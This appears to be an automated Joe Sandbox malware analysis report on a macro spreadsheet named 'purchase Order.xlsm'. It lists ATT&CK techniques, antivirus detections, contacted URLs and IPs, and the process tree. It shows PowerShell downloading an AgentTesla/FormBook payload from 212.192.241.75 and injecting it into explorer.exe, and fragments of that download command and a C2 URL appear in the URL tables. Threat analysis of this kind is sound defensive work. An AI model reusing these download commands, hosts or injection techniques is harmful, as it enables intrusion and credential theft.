Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (x2)
Source: C:\Users\Public\eVJOpc.exe | Code function: 8_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
Source: C:\Users\Public\eVJOpc.exe | Code function: 8_2_10004030 GetProcessHeap,HeapAlloc,GetUserNameW,lstrcmpW,GetProcessHeap,HeapFree,
Source: explorer.exe, 0000000A.00000000.397828663.00000000047D0000.00000004.00000001.sdmp | Binary or memory string: \\192.168.2.1\all\procexp.exe
Source: explorer.exe, 0000000A.00000000.402916350.0000000008778000.00000004.00000001.sdmp | Binary or memory string: C:\Program Files\Windows Defender\MSASCui.exe
Source: explorer.exe, 0000000A.00000000.397828663.00000000047D0000.00000004.00000001.sdmp | Binary or memory string: "c:\users\user\desktop\procexp.exe

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY
Source: C:\Users\Public\eVJOpc.exe | Code function: 8_2_10007A00 RpcStringBindingComposeA,RpcBindingFromStringBindingA,RpcStringFreeA,
Source: C:\Users\Public\eVJOpc.exe | Code function: 8_2_10007A90 RpcBindingFree,

            Mitre Att&ck Matrix

Techniques with matched signatures, listed by tactic. The digits after a technique name are the signature-count badges shown in the original matrix cell, kept as rendered; tactics whose cells carried no badge (including the mobile-only Network Effects and Remote Service Effects columns) are marked none.

Initial Access: none
Execution: Scripting 1; Shared Modules 1; Exploitation for Client Execution 12; Command and Scripting Interpreter 1; PowerShell 1
Persistence: none
Privilege Escalation: Extra Window Memory Injection 1; Process Injection 512
Defense Evasion: Deobfuscate/Decode Files or Information 1; Scripting 1; Obfuscated Files or Information 2; Software Packing 1; Extra Window Memory Injection 1; Masquerading 111; Virtualization/Sandbox Evasion 31; Process Injection 512
Credential Access: Input Capture 1
Discovery: Account Discovery 1; File and Directory Discovery 2; System Information Discovery 114; Security Software Discovery 241; Process Discovery 2; Virtualization/Sandbox Evasion 31; Application Window Discovery 1; System Owner/User Discovery 1
Lateral Movement: none
Collection: Archive Collected Data 1; Input Capture 1; Clipboard Data 1
Exfiltration: none
Command and Control: Ingress Tool Transfer 11; Encrypted Channel 1; Non-Application Layer Protocol 1; Application Layer Protocol 121
Network Effects: none
Remote Service Effects: none
Impact: System Shutdown/Reboot 1

            Behavior Graph

Behavior Graph ID: 510341. Sample: purchase Order.xlsm. Start date: 27/10/2021. Architecture: WINDOWS. Score: 100.

Process tree and node annotations carried by the graph (the rendered graph itself is not reproduced here):

• Start node: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures
  • EXCEL.EXE (started)
    • Dropped: C:\Users\user\Desktop\~$purchase Order.xlsm (data); C:\Users\user\...\purchase Order.xlsm (copy), Microsoft
    • powershell.exe (started)
      • Network: 212.192.241.75, ports 49746 and 80, RAPMSB-ASRU, Russian Federation
      • Dropped: C:\Users\Public\eVJOpc.exe (PE32)
      • Signatures: Drops PE files to the user root directory; Powershell drops PE file
      • explorer.exe (started)
      • conhost.exe (started)
  • explorer.exe (started)
    • eVJOpc.exe (started)
      • Dropped: C:\Users\user\AppData\...\qqxmvpxcvyt.dll (PE32)
      • Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 2 other signatures
      • eVJOpc.exe (started)
        • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        • explorer.exe (injected)
          • wlanext.exe (started)
            • Signatures: Tries to detect virtualization through RDTSC time measurements
            • cmd.exe (started)
              • conhost.exe (started)


            Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
purchase Order.xlsm | 22% | Virustotal |
purchase Order.xlsm | 41% | ReversingLabs | Script.Downloader.EncDoc
purchase Order.xlsm | 100% | Avira | W2000M/YAV.Minerva.ssocv

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsz3A72.tmp\qqxmvpxcvyt.dll | 100% | Avira | TR/Tesla.ivvdd
C:\Users\Public\eVJOpc.exe | 100% | Avira | TR/Tesla.amqdv
C:\Users\Public\eVJOpc.exe | 100% | Joe Sandbox ML |
C:\Users\Public\eVJOpc.exe | 50% | ReversingLabs | Win32.Trojan.AgentTesla
C:\Users\user\AppData\Local\Temp\nsz3A72.tmp\qqxmvpxcvyt.dll | 38% | ReversingLabs | Win32.Trojan.AgentTesla

Unpacked PE Files

Source | Detection | Scanner | Label
8.2.eVJOpc.exe.f040000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
9.2.eVJOpc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
9.1.eVJOpc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
9.0.eVJOpc.exe.400000.3.unpack | 100% | Avira | TR/Patched.Ren.Gen2
19.2.wlanext.exe.2e7de48.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
9.0.eVJOpc.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
9.0.eVJOpc.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen2
9.0.eVJOpc.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
8.0.eVJOpc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
9.0.eVJOpc.exe.400000.2.unpack | 100% | Avira | TR/Patched.Ren.Gen2
9.0.eVJOpc.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
8.2.eVJOpc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
9.0.eVJOpc.exe.400000.1.unpack | 100% | Avira | TR/Patched.Ren.Gen2

            Domains

            No Antivirus matches

            URLs

Source | Detection | Scanner | Label
https://roaming.edog. | 0% | URL Reputation | safe
https://cdn.entity. | 0% | URL Reputation | safe
https://powerlift.acompli.net | 0% | URL Reputation | safe
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
https://cortana.ai | 0% | URL Reputation | safe
https://api.aadrm.com/ | 0% | URL Reputation | safe
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | URL Reputation | safe
http://212.192.241.75/sam/new3.exenvoke-WebRequest | 0% | Avira URL Cloud | safe
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | 0% | Avira URL Cloud | safe
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe
https://officeci.azurewebsites.net/api/ | 0% | URL Reputation | safe
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://212.192.241.75/sam/new3.exe-OutFile$env:public | 0% | Avira URL Cloud | safe
https://api.aadrm.com | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe
https://www.odwebp.svc.ms | 0% | URL Reputation | safe
https://api.addins.store.officeppe.com/addinstemplate | 0% | URL Reputation | safe
https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe
https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe
https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe
https://ncus.contentsync. | 0% | URL Reputation | safe
https://apis.live.net/v5.0/ | 0% | URL Reputation | safe
https://wus2.contentsync. | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://asgsmsproxyapi.azurewebsites.net/ | 0% | URL Reputation | safe
http://212.192.241.75/sam/new3.exe | 12% | Virustotal |
http://212.192.241.75/sam/new3.exe | 0% | Avira URL Cloud | safe
www.art-for-a-cause.com/m5cw/ | 100% | Avira URL Cloud | malware
https://go.micros | 0% | Avira URL Cloud | safe
https://contoso.com/ | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://212.192.241.75/sam/new3.exe | true | 12%, Virustotal; Avira URL Cloud: safe | unknown
www.art-for-a-cause.com/m5cw/ | true | Avira URL Cloud: malware | low

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://api.diagnosticssdf.office.com | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://login.microsoftonline.com/ | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://shell.suite.office.com:1443 | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://autodiscover-s.outlook.com/ | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://roaming.edog. | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | URL Reputation: safe | unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://cdn.entity. | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | URL Reputation: safe | unknown
https://api.addins.omex.office.net/appinfo/query | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://clients.config.office.net/user/v1.0/tenantassociationkey | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://powerlift.acompli.net | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | URL Reputation: safe | unknown
https://rpsticket.partnerservices.getmicrosoftkey.com | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | URL Reputation: safe | unknown
https://lookup.onenote.com/lookup/geolocation/v1 | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://cortana.ai | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | URL Reputation: safe | unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://cloudfiles.onenote.com/upload.aspx | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://entitlement.diagnosticssdf.office.com | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://api.aadrm.com/ | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | URL Reputation: safe | unknown
https://ofcrecsvcapi-int.azurewebsites.net/ | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | URL Reputation: safe | unknown
http://212.192.241.75/sam/new3.exenvoke-WebRequest | powershell.exe, 00000001.00000002.356654326.0000000002C77000.00000004.00000020.sdmp | true | Avira URL Cloud: safe | unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://api.microsoftstream.com/api/ | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://cr.office.com | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.361493895.0000000005A36000.00000004.00000001.sdmp | false | | high
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | Avira URL Cloud: safe | low
https://portal.office.com/account/?ref=ClientMeControl | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.357492979.00000000049D1000.00000004.00000001.sdmp | false | | high
https://graph.ppe.windows.net | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://res.getmicrosoftkey.com/api/redemptionevents | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | URL Reputation: safe | unknown
https://powerlift-frontdesk.acompli.net | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | URL Reputation: safe | unknown
https://tasks.office.com | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://officeci.azurewebsites.net/api/ | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | URL Reputation: safe | unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://store.office.cn/addinstemplate | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000003.341416445.0000000007811000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.357769457.0000000004B13000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://212.192.241.75/sam/new3.exe-OutFile$env:public | powershell.exe, 00000001.00000002.355847421.0000000002B50000.00000004.00000040.sdmp, powershell.exe, 00000001.00000002.356485936.0000000002C48000.00000004.00000020.sdmp, powershell.exe, 00000001.00000002.363747347.00000000077EA000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.355784668.0000000002B40000.00000004.00000040.sdmp | true | Avira URL Cloud: safe | unknown
https://api.aadrm.com | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000003.341416445.0000000007811000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.357769457.0000000004B13000.00000004.00000001.sdmp | false | | high
https://go.micro | powershell.exe, 00000001.00000002.358997121.0000000004DD2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid= | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://globaldisco.crm.dynamics.com | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://contoso.com/Icon | powershell.exe, 00000001.00000002.361493895.0000000005A36000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://dev0-api.acompli.net/autodetect | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | URL Reputation: safe | unknown
https://www.odwebp.svc.ms | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | URL Reputation: safe | unknown
https://api.powerbi.com/v1.0/myorg/groups | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://web.microsoftstream.com/video/ | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
http://nsis.sf.net/NSIS_ErrorError | eVJOpc.exe, 00000008.00000000.354925603.0000000000409000.00000008.00020000.sdmp, eVJOpc.exe, 00000009.00000000.359874534.0000000000409000.00000008.00020000.sdmp, eVJOpc.exe.1.dr | false | | high
https://api.addins.store.officeppe.com/addinstemplate | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | URL Reputation: safe | unknown
https://graph.windows.net | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://dataservice.o365filtering.com/ | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000001.00000003.341416445.0000000007811000.00000004.00000001.sdmp, powershell.exe, 00000001.00000002.357769457.0000000004B13000.00000004.00000001.sdmp | false | | high
https://officesetup.getmicrosoftkey.com | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | URL Reputation: safe | unknown
https://analysis.windows.net/powerbi/api | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://prod-global-autodetect.acompli.net/autodetect | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | URL Reputation: safe | unknown
https://outlook.office365.com/autodiscover/autodiscover.json | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
http://nsis.sf.net/NSIS_Error | eVJOpc.exe, eVJOpc.exe, 00000008.00000000.354925603.0000000000409000.00000008.00020000.sdmp, eVJOpc.exe, 00000009.00000000.359874534.0000000000409000.00000008.00020000.sdmp, eVJOpc.exe.1.dr | false | | high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://ncus.contentsync. | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | URL Reputation: safe | unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
http://weather.service.msn.com/data.aspx | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://apis.live.net/v5.0/ | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | URL Reputation: safe | unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://management.azure.com | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://outlook.office365.com | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://wus2.contentsync. | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | URL Reputation: safe | unknown
https://incidents.diagnostics.office.com | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://clients.config.office.net/user/v1.0/ios | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://insertmedia.bing.office.net/odc/insertmedia | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://o365auditrealtimeingestion.manage.office.com | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://contoso.com/License | powershell.exe, 00000001.00000002.361493895.0000000005A36000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://outlook.office365.com/api/v1.0/me/Activities | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://api.office.net | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://incidents.diagnosticssdf.office.com | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://asgsmsproxyapi.azurewebsites.net/ | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | URL Reputation: safe | unknown
https://clients.config.office.net/user/v1.0/android/policies | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://entitlement.diagnostics.office.com | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://substrate.office.com/search/api/v2/init | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://outlook.office.com/ | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://storage.live.com/clientlogs/uploadlocation | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://outlook.office365.com/ | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://webshell.suite.office.com | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://substrate.office.com/search/api/v1/SearchHistory | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://go.micros | powershell.exe, 00000001.00000002.363747347.00000000077EA000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000001.00000002.361493895.0000000005A36000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://management.azure.com/ | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high
https://login.windows.net/common/oauth2/authorize | 88AF1BA5-4E6A-4278-A045-D7218995DD99.0.dr | false | | high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
212.192.241.75 | unknown | Russian Federation | 61269 | RAPMSB-ASRU | true

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 510341
Start date: 27.10.2021
Start time: 18:14:40
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 39s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: purchase Order.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSM@15/13@0/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 31.4% (good quality ratio 27.9%)
• Quality average: 72.9%
• Quality standard deviation: 32.9%
HCA Information:
• Successful, ratio: 87%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsm
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 52.109.88.177, 52.109.76.34, 52.109.12.22, 20.82.210.154, 8.248.91.254, 8.248.117.254, 8.248.101.254, 67.27.142.126, 8.248.141.254, 20.54.110.249, 40.112.88.60, 52.251.79.25, 80.67.82.242, 80.67.82.235
